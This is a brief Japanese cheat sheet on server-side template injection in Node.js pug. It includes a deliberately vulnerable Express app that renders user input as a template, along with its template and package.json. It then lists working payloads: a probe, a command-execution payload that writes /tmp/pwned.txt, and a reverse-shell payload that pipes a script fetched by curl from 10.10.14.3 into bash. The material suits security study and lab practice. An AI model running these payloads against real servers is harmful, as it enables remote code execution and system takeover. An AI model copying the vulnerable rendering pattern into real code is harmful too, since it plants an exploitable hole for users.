サーバーサイドテンプレートインジェクション

攻撃する方法

http://www.target.com/page?name={{7*7}}

脆弱なソースコード　（nodejs pug）

https://github.com/0xdbe-appsec/ssti-express-pug

app.js

const express = require('express');
const pug = require('pug');
const fs = require('fs');

// Create an express application
const app = express();

// Create a greeting endpoint
app.get('/', (req, res) => {
    
  // Open html file
  fs.readFile(__dirname +'/index.pug', 'utf8', (err, template) => {
    
    // Error if html file doesn't exist
    if (err) throw err;
              
    // Customize greeting message
    if(typeof req.query.name != 'undefined'){
      console.log(req.query.name);
      template = template.replace(/world/g, req.query.name);
    }
   
    // Send HTML
    let html = pug.render(template)
    res.set('Content-Type', 'text/html');
    res.send(html);
  });
});

// Start Application
app.listen(3005, () => console.log('app listening on 3005'));

index.pug

h1 hello world

form(method='GET' action='/')
  div.form-group
    label(for='name') Name:
    input#name.form-control(type='text', placeholder='first and last' name='name')
  button.btn.btn-primary(type='submit') Submit 

package.json

  "dependencies": {
    "express": "^4.17.1",
    "pug": "^2.0.4"
  }

攻撃する方法

http://localhost:3005/?name=%23%7B7*7%7D

書き込み

http://localhost:3005/?name=%23%7Bfunction()%7BlocalLoad%3Dglobal.process.mainModule.constructor._load%3Bsh%3DlocalLoad(%22child_process%22).exec(%27touch%20%2Ftmp%2Fpwned.txt%27)%7D()%7D

リバースシェル

#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}